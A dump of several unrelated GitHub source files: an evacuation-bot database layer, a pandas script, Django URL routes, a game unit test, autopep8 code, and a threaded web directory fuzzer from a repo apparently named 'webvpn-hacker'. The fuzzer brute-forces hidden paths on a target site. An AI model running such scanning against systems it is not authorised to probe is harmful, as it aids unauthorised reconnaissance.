INTO `{self.__table}` \n (`id`, `user_id`, `a_type`, `a_service`, `city_from_id`, `city_to_id`, `info`, `scheduled`, `approved`) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n self._execute(query,\n (ann.id, ann.user_id, ann.a_type.name, ann.a_service.name,\n ann.city_from_id, ann.city_to_id, ann.info, ann.scheduled, approved))\n\n def find(self, announcement_id: str) -> Optional[AnnouncementEntity]:\n logging.debug(f\"Find Announcement({announcement_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, announcement_id)\n return AnnouncementEntity.from_dict(r) if r else None\n\n def delete(self, announcement_id: str):\n logging.debug(f\"Delete Announcement({announcement_id})\")\n query = f'UPDATE `{self.__table}` SET approved = %s WHERE id=%s;'\n self._execute(query, (False, announcement_id))\n\n def find_by_user(self, user_id: int, approved=True) -> list:\n logging.debug(f\"Select all Announcements for User({user_id})\")\n query = f\"\"\"\n SELECT a.*, c.status, c.updated_at FROM `{self.__table}` AS a\n LEFT JOIN evacuation_call_status as c ON a.id = c.announcement_id\n WHERE user_id=%s and approved=%s ORDER BY created;\n \"\"\"\n result = self._select_list(query, (user_id, approved))\n logging.debug(f\"Selected {len(result)} Announcements for User({user_id})\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def find_by_city(self, city_from_id: int, 
approved=True) -> list:\n logging.debug(f\"Select all Announcements for city {city_from_id}\")\n query = f\"\"\"\n SELECT a.*, c.status, c.updated_at FROM `{self.__table}` AS a\n LEFT JOIN evacuation_call_status as c ON a.id = c.announcement_id\n WHERE city_from_id=%s and approved=%s ORDER BY created;\n \"\"\"\n result = self._select_list(query, (city_from_id, approved))\n logging.debug(f\"Selected {len(result)} Announcements in city {city_from_id}\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def find_all(self):\n logging.debug(f\"Select all Announcements\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} Announcements\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def count(self, a_type: AnnouncementType, from_date: datetime.date = None):\n logging.debug(f\"Find Announcements({a_type.name}) count from date - {from_date}\")\n from_date_condition = \"AND created > %s\" if from_date else \"\"\n from_date_parameters: tuple = (a_type.name, from_date) if from_date else (a_type.name,)\n\n query = f'SELECT count(*) as res FROM `{self.__table}` WHERE a_type=%s {from_date_condition} AND approved=True;'\n r = self._select_one(query, from_date_parameters)\n return r['res'] if r else None\n\n def find_after(self, a_type: AnnouncementType, after_timestamp: datetime, approved=True):\n logging.debug(f\"Select all Announcements({a_type.name}) after_timestamp {after_timestamp}\")\n query = f'SELECT * FROM `{self.__table}` WHERE a_type=%s AND created >= %s AND user_id<=%s AND approved=%s ORDER BY created;'\n result = self._select_list(query, (a_type.name, after_timestamp, ADMIN_ID_MAX, approved))\n logging.debug(f\"Selected {len(result)} Announcements({a_type.name}) after_timestamp {after_timestamp}\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n\nclass CityDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_CITY\n\n def save(self, city: City):\n logging.debug(f\"Save City({city.name})\")\n query = f\"\"\"\n INSERT INTO `{self.__table}` (`name`, `country`) \n VALUES (%s, %s);\n \"\"\"\n self._execute(query, (city.name, city.country))\n\n def find(self, city_id: int) -> Optional[City]:\n logging.debug(f\"Find City({city_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, city_id)\n return City.from_dict(r) if r else None\n\n def find_all(self) -> list:\n logging.debug(f\"Select all Cities\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} Cities\")\n return [City.from_dict(r) for r in result]\n\n def find_by_name(self, city_name: str):\n logging.debug(f\"Find City({city_name})\")\n query = f'SELECT * FROM `{self.__table}` WHERE name=%s;'\n r = self._select_one(query, city_name)\n return City.from_dict(r) if r else None\n\n\nclass UserDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_USER\n\n def save(self, user: User):\n query = f\"\"\"\n INSERT INTO `{self.__table}` (`id`) \n VALUES (%s);\n \"\"\"\n self._execute(query, (user.id))\n\n def find(self, user_id: int) -> Optional[User]:\n logging.debug(f\"Find User({user_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, (user_id))\n return User.from_dict(r) if r else None\n\n def count(self, from_date: datetime.date = None):\n logging.debug(f\"Find Users count from date - {from_date}\")\n 
from_date_condition = \"WHERE created > %s\" if from_date else \"\"\n from_date_parameters: tuple = (from_date) if from_date else ()\n\n query = f'SELECT count(*) as res FROM `{self.__table}` {from_date_condition} ;'\n r = self._select_one(query, from_date_parameters)\n return r['res'] if r else None\n\n\nclass BlockedUserDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_BLOCKED_USER\n\n def find_all(self) -> list:\n logging.debug(f\"Select all BlockedUsers\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} BlockedUsers\")\n return [BlockedUser.from_dict(r) for r in result]\n","repo_name":"VadymPolianskyi/ua-evacuation-bot","sub_path":"src/db/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4867618736","text":"import pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npath= \"/home/mrov/Scrapy/scrapy/autoAm/autosAm/autosAm/all_data.csv\"\n\n\nif not os.path.exists():\n print(\"Error with loading file\")\n\ndf=pd.read_csv(\"all_data.csv\")\nprint(df.head())\n\nnumericDf = df.select_dtypes(include=np.number)\n\nnumericDf.plot(kind='scatter',x='mileage',y='price')\nplt.show()\n\ngroupingDf=df.groupby(\"year\")\nprint(numericDf.corr(method='pearson'))\nprices=df[\"price\"]\nprices.plot()\nplt.show()\n\nprint(\"The maximum price is \",df[\"price\"].max())\nprint(\"The minimum price is \",df[\"price\"].min())\n\nprint(\"The maximum mileage is \",df[\"mileage\"].max())\nprint(\"The minimum mileage is\",df[\"mileage\"].min())\n\nprint(\"On 2017 year prices are \")\nprint(df[df['year']==\"2017\"]['price'])","repo_name":"GrikTesaSystem/Autoam","sub_path":"preprocesData.py","file_name":"preprocesData.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27290549593","text":"\"\"\"conf URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom . 
import views\n\napp_name = 'recruiting'\n\nurlpatterns = [\n path('responses/', views.ResponseListView.as_view(), name='response_list'),\n path('responses/search/', views.ResponseListView.as_view(), name='response_list_search'),\n path('responses/notif/get/', views.get_notifications, name='get_notif'),\n path('responses/create//', views.ResponseCreateView.as_view(), name='response_create'),\n path('responses/create///', views.ResponseCreateView.as_view(), name='response_create_submit'),\n path('responses/accept//', views.response_accept, name='response_accept'),\n path('responses/reject//', views.response_reject, name='response_reject'),\n path('responses/delete//', views.ResponseDeleteView.as_view(), name='response_delete'),\n]\n","repo_name":"ruchej/gb_hh","sub_path":"hh/recruiting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32026932048","text":"from config.config import *\nconfig = getConfig()\nprefixes = [] if config['prefixes'] == \"[]\" else [i for i in config['prefixes'][1:-1].split(',')]\nsuffixes = [] if config['suffixes'] == \"[]\" else [i for i in config['suffixes'][1:-1].split(',')]\nextensions = [] if config['extensions'] == \"[]\" else [i for i in config['extensions'][1:-1].split(',')]\nthread_count = config['thread_count']\ncrawl = False if config['crawl'] == \"False\" else True\n\nfrom lib.scanner import Scanner\nfrom lib.crawl import Crawler\nfrom lib.utils import clean_path\n\nclass Fuzzer:\n def __init__(self, requester, dictionary, **kwargs):\n self._threads = []\n self._scanned = set()\n self._requester = requester\n self._dictionary = dictionary\n self._play_event = threading.Event()\n self._quit_event = threading.Event()\n self._pause_semaphore = threading.Semaphore(0)\n self._base_path = None\n self.exc = None\n self.match_callbacks = kwargs.get(\"match_callbacks\", [])\n self.not_found_callbacks = kwargs.get(\"not_found_callbacks\", [])\n self.error_callbacks = kwargs.get(\"error_callbacks\", [])\n\n def setup_scanners(self):\n self.scanners = {\"default\": {}, \"prefixes\": {}, \"suffixes\": {},}\n\n # Default scanners (wildcard testers)\n self.scanners[\"default\"].update({\n \"index\": Scanner(self._requester, path=self._base_path),\n \"random\": Scanner(self._requester, path=self._base_path + WILDCARD_TEST_POINT_MARKER),\n })\n\n for prefix in prefixes + DEFAULT_TEST_PREFIXES:\n self.scanners[\"prefixes\"][prefix] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{prefix}{WILDCARD_TEST_POINT_MARKER}\",\n )\n\n for suffix in suffixes + DEFAULT_TEST_SUFFIXES:\n self.scanners[\"suffixes\"][suffix] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{WILDCARD_TEST_POINT_MARKER}{suffix}\",\n )\n\n for extension in extensions:\n if \".\" + extension not in self.scanners[\"suffixes\"]:\n self.scanners[\"suffixes\"][\".\" + extension] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{WILDCARD_TEST_POINT_MARKER}.{extension}\",\n )\n\n def setup_threads(self):\n if self._threads:\n self._threads = []\n\n for _ in range(thread_count):\n new_thread = threading.Thread(target=self.thread_proc)\n new_thread.daemon = True\n self._threads.append(new_thread)\n\n def get_scanners_for(self, path):\n path = clean_path(path)\n\n for prefix in self.scanners[\"prefixes\"]:\n if path.startswith(prefix):\n yield self.scanners[\"prefixes\"][prefix]\n\n for suffix in 
self.scanners[\"suffixes\"]:\n if path.endswith(suffix):\n yield self.scanners[\"suffixes\"][suffix]\n\n for scanner in self.scanners[\"default\"].values():\n yield scanner\n\n def start(self):\n self.setup_scanners()\n self.setup_threads()\n self.play()\n\n for thread in self._threads:\n thread.start()\n\n def is_finished(self):\n if self.exc:\n raise self.exc\n\n for thread in self._threads:\n if thread.is_alive():\n return False\n\n return True\n\n def play(self):\n self._play_event.set()\n\n def scan(self, path, scanners):\n if path in self._scanned:\n return\n else:\n self._scanned.add(path)\n\n response = self._requester.request(path)\n\n for tester in scanners:\n if not tester.check(path, response):\n for callback in self.not_found_callbacks:\n callback(response)\n return\n\n for callback in self.match_callbacks:\n callback(response)\n\n if crawl:\n for path_ in Crawler.crawl(response):\n if self._dictionary.is_valid(path_):\n self.scan(path_, self.get_scanners_for(path_))\n\n def set_base_path(self, path):\n self._base_path = path\n\n def thread_proc(self):\n while True:\n try:\n path = next(self._dictionary)\n scanners = self.get_scanners_for(path)\n self.scan(self._base_path + path, scanners)\n except StopIteration:\n break\n\n if not self._play_event.is_set():\n self._pause_semaphore.release()\n self._play_event.wait()\n\n","repo_name":"WD-2711/webvpn-hacker","sub_path":"lib/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"873213530","text":"from unittest import TestCase\nfrom unittest.mock import patch\nimport io\n\nimport game\n\n\nclass TestDescribeCurrentLocation(TestCase):\n @patch('sys.stdout', new_callable=io.StringIO)\n def test_describe_current_location_correct_print_output(self, mock_output):\n board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room', (1, 1): 'Treasure room'}\n character = {'X-coordinate': 0, 'Y-coordinate': 0}\n game.describe_current_location(board, character)\n game_printed_this = mock_output.getvalue()\n expected = 'You are at (0, 0)\\nCurrent area is Empty room\\n'\n self.assertEqual(game_printed_this, expected)\n\n def test_describe_current_location_both_parameters_remain_unchanged(self):\n board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room', (1, 1): 'Treasure room'}\n character = {'X-coordinate': 0, 'Y-coordinate': 0, 'Current HP': 5}\n game.describe_current_location(board, character)\n expected_board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room',\n (1, 1): 'Treasure room'}\n expected_character = {'X-coordinate': 0, 'Y-coordinate': 0, 'Current HP': 5}\n self.assertEqual(expected_board, board)\n self.assertEqual(expected_character, character)","repo_name":"ws111994/SUD_Love_Adventure","sub_path":"test_describe_current_location.py","file_name":"test_describe_current_location.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41597613112","text":"import copy\nimport os\nimport sys\nimport inspect\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n try:\n from StringIO import StringIO\n except ImportError:\n from io import StringIO\nimport token\nimport tokenize\nfrom optparse import OptionParser\nfrom subprocess import Popen, PIPE\nfrom difflib import unified_diff\nimport tempfile\n\nfrom distutils.version import 
StrictVersion\ntry:\n import pep8\n if StrictVersion(pep8.__version__) < StrictVersion('1.3a2'):\n pep8 = None\nexcept ImportError:\n pep8 = None\n\n\n__version__ = '0.7.3'\n\n\nPEP8_BIN = 'pep8'\nPEP8_PASSES_MAX = 100\nCR = '\\r'\nLF = '\\n'\nCRLF = '\\r\\n'\nMAX_LINE_WIDTH = 79\n\n\ndef open_with_encoding(filename, encoding, mode='r'):\n \"\"\"Return opened file with a specific encoding.\"\"\"\n try:\n # Python 3\n return open(filename, mode=mode, encoding=encoding)\n except TypeError:\n return open(filename, mode=mode)\n\n\ndef detect_encoding(filename):\n \"\"\"Return file encoding.\"\"\"\n try:\n # Python 3\n try:\n with open(filename, 'rb') as input_file:\n encoding = tokenize.detect_encoding(input_file.readline)[0]\n\n # Check for correctness of encoding\n import io\n with io.TextIOWrapper(input_file, encoding) as wrapper:\n wrapper.read()\n\n return encoding\n except (SyntaxError, LookupError, UnicodeDecodeError):\n return 'latin-1'\n except AttributeError:\n return 'utf-8'\n\n\ndef read_from_filename(filename, readlines=False):\n \"\"\"Return contents of file.\"\"\"\n with open_with_encoding(filename,\n encoding=detect_encoding(filename)) as input_file:\n return input_file.readlines() if readlines else input_file.read()\n\n\nclass FixPEP8(object):\n\n \"\"\"Fix invalid code.\n\n Fixer methods are prefixed \"fix_\". The _fix_source() method looks for these\n automatically.\n\n The fixer method can take either one or two arguments (in addition to\n self). The first argument is \"result\", which is the error information from\n pep8. The second argument, \"logical\", is required only for logical-line\n fixes.\n\n The fixer method can return the list of modified lines or None. An empty\n list would mean that no changes were made. None would mean that only the\n line reported in the pep8 error was modified. Note that the modified line\n numbers that are returned are indexed at 1. 
This typically would correspond\n with the line number reported in the pep8 error information.\n\n [fixed method list]\n - e111\n - e121,e122,e123,e124,e125,e126,e127,e128\n - e201,e202,e203\n - e211\n - e221,e222,e223,e224,e225\n - e231\n - e251\n - e261,e262\n - e271,e272,e273,e274\n - e301,e302,e303\n - e401\n - e502\n - e701,e702\n - e711\n - e721\n - w291,w293\n - w391\n - w602,w603,w604\n\n \"\"\"\n\n def __init__(self, filename, options, contents=None):\n self.filename = filename\n if contents is None:\n self.source = read_from_filename(filename, readlines=True)\n else:\n sio = StringIO(contents)\n self.source = sio.readlines()\n self.original_source = copy.copy(self.source)\n self.newline = find_newline(self.source)\n self.options = options\n self.indent_word = _get_indentword(\"\".join(self.source))\n self.logical_start = None\n self.logical_end = None\n # method definition\n self.fix_e111 = self.fix_e101\n self.fix_e128 = self.fix_e127\n self.fix_e202 = self.fix_e201\n self.fix_e203 = self.fix_e201\n self.fix_e211 = self.fix_e201\n self.fix_e221 = self.fix_e271\n self.fix_e222 = self.fix_e271\n self.fix_e223 = self.fix_e271\n self.fix_e241 = self.fix_e271\n self.fix_e242 = self.fix_e224\n self.fix_e261 = self.fix_e262\n self.fix_e272 = self.fix_e271\n self.fix_e273 = self.fix_e271\n self.fix_e274 = self.fix_e271\n self.fix_w191 = self.fix_e101\n\n def _fix_source(self, results):\n completed_lines = set()\n for result in sorted(results, key=_priority_key):\n if result['line'] in completed_lines:\n continue\n\n fixed_methodname = \"fix_%s\" % result['id'].lower()\n if hasattr(self, fixed_methodname):\n fix = getattr(self, fixed_methodname)\n\n is_logical_fix = len(inspect.getargspec(fix).args) > 2\n if is_logical_fix:\n # Do not run logical fix if any lines have been modified.\n if completed_lines:\n continue\n\n logical = self._get_logical(result)\n if not logical:\n continue\n\n modified_lines = fix(result, logical)\n else:\n modified_lines = fix(result)\n\n if modified_lines:\n completed_lines.update(modified_lines)\n elif modified_lines == []: # Empty list means no fix\n if self.options.verbose:\n sys.stderr.write('Not fixing {f} on line {l}\\n'.format(\n f=result['id'], l=result['line']))\n else: # We assume one-line fix when None\n completed_lines.add(result['line'])\n else:\n if self.options.verbose:\n sys.stderr.write(\"'%s' is not defined.\\n\" %\n fixed_methodname)\n info = result['info'].strip()\n sys.stderr.write(\"%s:%s:%s:%s\\n\" % (self.filename,\n result['line'],\n result['column'],\n info))\n\n def fix(self):\n \"\"\"Return a version of the source code with PEP 8 violations fixed.\"\"\"\n if pep8:\n pep8_options = {\n 'ignore':\n self.options.ignore and self.options.ignore.split(','),\n 'select':\n self.options.select and self.options.select.split(','),\n }\n results = _execute_pep8(pep8_options, self.source)\n else:\n if self.options.verbose:\n sys.stderr.write('Running in compatibility mode. 
Consider '\n 'upgrading to the latest pep8.\\n')\n results = _spawn_pep8(([\"--ignore=\" + self.options.ignore]\n if self.options.ignore else []) +\n ([\"--select=\" + self.options.select]\n if self.options.select else []) +\n [self.filename])\n self._fix_source(results)\n return \"\".join(self.source)\n\n def fix_e101(self, _):\n \"\"\"Reindent all lines.\"\"\"\n reindenter = Reindenter(self.source)\n if reindenter.run():\n original_length = len(self.source)\n self.source = reindenter.fixed_lines()\n return range(1, 1 + original_length)\n else:\n return []\n\n def find_logical(self, force=False):\n # make a variable which is the index of all the starts of lines\n if not force and self.logical_start is not None:\n return\n logical_start = []\n logical_end = []\n last_newline = True\n sio = StringIO(\"\".join(self.source))\n parens = 0\n for t in tokenize.generate_tokens(sio.readline):\n if t[0] in [tokenize.COMMENT, tokenize.DEDENT,\n tokenize.INDENT, tokenize.NL,\n tokenize.ENDMARKER]:\n continue\n if not parens and t[0] in [\n tokenize.NEWLINE, tokenize.SEMI\n ]:\n last_newline = True\n logical_end.append((t[3][0] - 1, t[2][1]))\n continue\n if last_newline and not parens:\n logical_start.append((t[2][0] - 1, t[2][1]))\n last_newline = False\n if t[0] == tokenize.OP:\n if t[1] in '([{':\n parens += 1\n elif t[1] in '}])':\n parens -= 1\n self.logical_start = logical_start\n self.logical_end = logical_end\n\n def _get_logical(self, result):\n \"\"\"Return the logical line corresponding to the result.\n\n Assumes input is already E702-clean.\n\n \"\"\"\n try:\n self.find_logical()\n except (IndentationError, tokenize.TokenError):\n return None\n\n row = result['line'] - 1\n col = result['column'] - 1\n ls = None\n le = None\n for i in range(0, len(self.logical_start), 1):\n x = self.logical_end[i]\n if x[0] > row or (x[0] == row and x[1] > col):\n le = x\n ls = self.logical_start[i]\n break\n if ls is None:\n return None\n original = self.source[ls[0]:le[0] + 1]\n return ls, le, original\n\n def _fix_reindent(self, result, logical, fix_distinct=False):\n \"\"\"Fix a badly indented line.\n\n This is done by adding or removing from its initial indent only.\n\n \"\"\"\n if not logical:\n return []\n ls, _, original = logical\n try:\n rewrapper = Wrapper(original, hard_wrap=MAX_LINE_WIDTH)\n except (tokenize.TokenError, IndentationError):\n return []\n valid_indents = rewrapper.pep8_expected()\n if not rewrapper.rel_indent:\n return []\n if result[\"line\"] > ls[0]:\n # got a valid continuation line number from pep8\n row = result[\"line\"] - ls[0] - 1\n # always pick the first option for this\n valid = valid_indents[row]\n got = rewrapper.rel_indent[row]\n else:\n # Line number from pep8 isn't a continuation line. 
Instead,\n # compare our own function's result, look for the first mismatch,\n # and just hope that we take fewer than 100 iterations to finish.\n for row in range(0, len(original), 1):\n valid = valid_indents[row]\n got = rewrapper.rel_indent[row]\n if valid != got:\n break\n line = ls[0] + row\n # always pick the expected indent, for now.\n indent_to = valid[0]\n if fix_distinct and indent_to == 4:\n if len(valid) == 1:\n return []\n else:\n indent_to = valid[1]\n\n if got != indent_to:\n orig_line = self.source[line]\n new_line = ' ' * (indent_to) + orig_line.lstrip()\n if new_line == orig_line:\n return []\n else:\n self.source[line] = new_line\n return [line + 1] # Line indexed at 1\n else:\n return []\n\n def fix_e121(self, result, logical):\n \"\"\"The 'peculiar indent' error for hanging indents.\"\"\"\n # fix by adjusting initial indent level\n return self._fix_reindent(result, logical)\n\n def fix_e122(self, result, logical):\n \"\"\"The 'absent indent' error for hanging indents.\"\"\"\n # fix by adding an initial indent\n return self._fix_reindent(result, logical)\n\n def fix_e123(self, result, logical):\n \"\"\"The 'loose fingernails' indentation level error for hanging\n indents.\"\"\"\n # fix by deleting whitespace to the correct level\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original_line = self.source[line_index]\n\n fixed_line = (_get_indentation(logical_lines[0]) +\n original_line.lstrip())\n if fixed_line == original_line:\n return []\n else:\n self.source[line_index] = fixed_line\n\n def fix_e124(self, result, logical):\n \"\"\"The 'loose fingernails' indentation level error for visual\n indents.\"\"\"\n # fix by inserting whitespace before the closing bracket\n return self._fix_reindent(result, logical)\n\n def fix_e125(self, result, logical):\n \"\"\"The 'often not visually distinct' error.\"\"\"\n # fix by indenting the line in error to the next stop.\n modified_lines = self._fix_reindent(result, logical, fix_distinct=True)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n line_index = result['line'] - 1\n original_line = self.source[line_index]\n self.source[line_index] = self.indent_word + original_line\n\n def fix_e126(self, result, logical):\n \"\"\"The 'spectacular indent' error for hanging indents.\"\"\"\n # fix by deleting whitespace to the left\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original = self.source[line_index]\n\n fixed = (_get_indentation(logical_lines[0]) +\n self.indent_word + original.lstrip())\n if fixed == original:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e127(self, result, logical):\n \"\"\"The 'interpretive dance' indentation error.\"\"\"\n # Fix by inserting/deleting whitespace to the correct level.\n modified_lines = self._fix_reindent(result, logical)\n if modified_lines:\n return modified_lines\n else:\n # Fallback\n return self._align_visual_indent(result, logical)\n\n def _align_visual_indent(self, result, logical):\n \"\"\"Correct visual indent.\n\n This includes over (E127) and under (E128) indented lines.\n\n \"\"\"\n if not logical:\n return []\n logical_lines = logical[2]\n line_index = result['line'] - 1\n original = self.source[line_index]\n 
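# A hedged illustration of the fallback below (not from the pep8 docs):\n # the continuation line is padded with one space per character before the\n # '(' of the first logical line, so it lines up with that bracket; for\n # backslash continuations it instead gets one extra indent level.\n 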
fixed = original\n\n if '(' in logical_lines[0]:\n fixed = logical_lines[0].find('(') * ' ' + original.lstrip()\n elif logical_lines[0].rstrip().endswith('\\\\'):\n fixed = (_get_indentation(logical_lines[0]) +\n self.indent_word + original.lstrip())\n else:\n return []\n\n if fixed == original:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e201(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n # When multiline strings are involved, pep8 reports the error as\n # being at the start of the multiline string, which doesn't work\n # for us.\n if '\"\"\"' in target or \"'''\" in target:\n return []\n\n fixed = fix_whitespace(target,\n offset=offset,\n replacement='')\n\n if fixed == target:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e224(self, result):\n target = self.source[result['line'] - 1]\n offset = result['column'] - 1\n fixed = target[:offset] + target[offset:].replace('\\t', ' ')\n self.source[result['line'] - 1] = fixed\n\n def fix_e225(self, result):\n \"\"\"Fix whitespace around operator.\"\"\"\n target = self.source[result['line'] - 1]\n offset = result['column'] - 1\n fixed = target[:offset] + ' ' + target[offset:]\n\n # Only proceed if non-whitespace characters match.\n # And make sure we don't break the indentation.\n if (fixed.replace(' ', '') == target.replace(' ', '') and\n _get_indentation(fixed) == _get_indentation(target)):\n self.source[result['line'] - 1] = fixed\n else:\n return []\n\n def fix_e231(self, result):\n \"\"\"Add missing whitespace.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column']\n fixed = target[:offset] + ' ' + target[offset:]\n self.source[line_index] = fixed\n\n def fix_e251(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n # This is necessary since pep8 sometimes reports columns that goes\n # past the end of the physical line. 
This happens in cases like,\n # foo(bar\\n=None)\n c = min(result['column'] - 1,\n len(target) - 1)\n\n if target[c].strip():\n fixed = target\n else:\n fixed = target[:c].rstrip() + target[c:].lstrip()\n\n # There could be an escaped newline\n #\n # def foo(a=\\\n # 1)\n if (fixed.endswith('=\\\\\\n') or\n fixed.endswith('=\\\\\\r\\n') or\n fixed.endswith('=\\\\\\r')):\n self.source[line_index] = fixed.rstrip('\\n\\r \\t\\\\')\n self.source[line_index + 1] = \\\n self.source[line_index + 1].lstrip()\n return [line_index + 1, line_index + 2] # Line indexed at 1\n\n self.source[result['line'] - 1] = fixed\n\n def fix_e262(self, result):\n \"\"\"Fix spacing after comment hash.\"\"\"\n target = self.source[result['line'] - 1]\n offset = result['column']\n\n code = target[:offset].rstrip(' \\t#')\n comment = target[offset:].lstrip(' \\t#')\n\n fixed = code + (' # ' + comment if comment.strip()\n else self.newline)\n\n self.source[result['line'] - 1] = fixed\n\n def fix_e271(self, result):\n \"\"\"Fix extraneous whitespace around keywords.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n fixed = fix_whitespace(target,\n offset=offset,\n replacement=' ')\n\n if fixed == target:\n return []\n else:\n self.source[line_index] = fixed\n\n def fix_e301(self, result):\n cr = self.newline\n self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]\n\n def fix_e302(self, result):\n add_linenum = 2 - int(result['info'].split()[-1])\n cr = self.newline * add_linenum\n self.source[result['line'] - 1] = cr + self.source[result['line'] - 1]\n\n def fix_e304(self, result):\n line = result['line'] - 2\n if not self.source[line].strip():\n self.source[line] = ''\n\n def fix_e303(self, result):\n delete_linenum = int(result['info'].split(\"(\")[1].split(\")\")[0]) - 2\n delete_linenum = max(1, delete_linenum)\n\n # We need to count because pep8 reports an offset line number if there\n # are comments.\n cnt = 0\n line = result['line'] - 2\n modified_lines = []\n while cnt < delete_linenum:\n if line < 0:\n break\n if not self.source[line].strip():\n self.source[line] = ''\n modified_lines.append(1 + line) # Line indexed at 1\n cnt += 1\n line -= 1\n\n return modified_lines\n\n def fix_e401(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n if not target.lstrip().startswith('import'):\n return []\n\n # pep8 (1.3.1) reports false positive if there is an import statement\n # followed by a semicolon and some unrelated statement with commas in\n # it.\n if ';' in target:\n return []\n\n indentation = target.split(\"import \")[0]\n fixed = (target[:offset].rstrip('\\t ,') + self.newline +\n indentation + 'import ' + target[offset:].lstrip('\\t ,'))\n self.source[line_index] = fixed\n\n def fix_e501(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n indent = _get_indentation(target)\n source = target[len(indent):]\n sio = StringIO(target)\n\n # Check for multiline string.\n try:\n tokens = list(tokenize.generate_tokens(sio.readline))\n except (tokenize.TokenError, IndentationError):\n multi_line_candidate = break_multi_line(\n target, newline=self.newline, indent_word=self.indent_word)\n\n if multi_line_candidate:\n self.source[line_index] = multi_line_candidate\n return\n else:\n return []\n\n # Prefer\n # my_long_function_name(\n # x, y, z, ...)\n #\n # over\n # my_long_function_name(x, y,\n # z, ...)\n candidate0 = _shorten_line(tokens, 
source, target, indent,\n self.indent_word, newline=self.newline,\n reverse=False)\n candidate1 = _shorten_line(tokens, source, target, indent,\n self.indent_word, newline=self.newline,\n reverse=True)\n if candidate0 and candidate1:\n if candidate0.split(self.newline)[0].endswith('('):\n self.source[line_index] = candidate0\n else:\n self.source[line_index] = candidate1\n elif candidate0:\n self.source[line_index] = candidate0\n elif candidate1:\n self.source[line_index] = candidate1\n else:\n # Otherwise both don't work\n return []\n\n def fix_e502(self, result):\n \"\"\"Remove extraneous escape of newline.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n self.source[line_index] = target.rstrip('\\n\\r \\t\\\\') + self.newline\n\n def fix_e701(self, result):\n line_index = result['line'] - 1\n target = self.source[line_index]\n c = result['column']\n\n fixed_source = (target[:c] + self.newline +\n _get_indentation(target) + self.indent_word +\n target[c:].lstrip('\\n\\r \\t\\\\'))\n self.source[result['line'] - 1] = fixed_source\n\n def fix_e702(self, result, logical):\n \"\"\"Fix multiple statements on one line.\"\"\"\n logical_lines = logical[2]\n\n line_index = result['line'] - 1\n target = self.source[line_index]\n\n if target.rstrip().endswith('\\\\'):\n # Normalize '1; \\\\\\n2' into '1; 2'.\n self.source[line_index] = target.rstrip('\\n \\r\\t\\\\')\n self.source[line_index + 1] = self.source[line_index + 1].lstrip()\n 